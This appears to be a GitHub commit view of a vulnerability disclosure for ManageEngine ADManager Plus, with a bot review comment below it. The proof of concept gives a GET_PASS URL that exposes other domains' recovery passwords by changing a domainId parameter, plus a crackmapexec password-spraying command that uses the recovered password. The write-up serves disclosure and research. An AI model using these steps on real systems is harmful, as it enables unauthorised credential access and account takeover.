Update admanager-recovery-password-disclosure.md
passtheticket authored Nov 14, 2023
1 parent bb88bc3 commit a51f085
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion manage-engine-apps/admanager-recovery-password-disclosure.md
Expand Up @@ -7,4 +7,5 @@ Proof of Concept
2. Go to the URL https://target/ConfigureRecoverySettings/GET_PASS?req={"domainId"%3A"1"}
![alt text](https://github.com/passtheticket/vulnerability-research/blob/main/screenshots/manage_engine/14.PNG)
3. The password of other domains (if it is set) can be viewed changing req parameter value such as {"domainId":"2"}

4. We can conduct password spraying to inspect restored account if the password is not changed after the account restoration.
```crackmapexec smb <target-DC> -u users.txt -p unsafe.local@2023 --continue-on-success```
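Review bot: The command under step 4 opens and closes its triple-backtick fence on the same line as the command, so Markdown renders it as inline code rather than a block; put each fence on its own line. The literal value unsafe.local@2023 in that command reads as specific to one test environment, so replace it with a placeholder such as <recovered-password> and state that it stands for the value returned by GET_PASS in step 2. Step 4's wording "to inspect restored account" also leaves the link between the disclosed recovery password and restored accounts implicit; spell that out. Since the step only works "if the password is not changed after the account restoration", add a line recommending that restored accounts be required to change their password.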
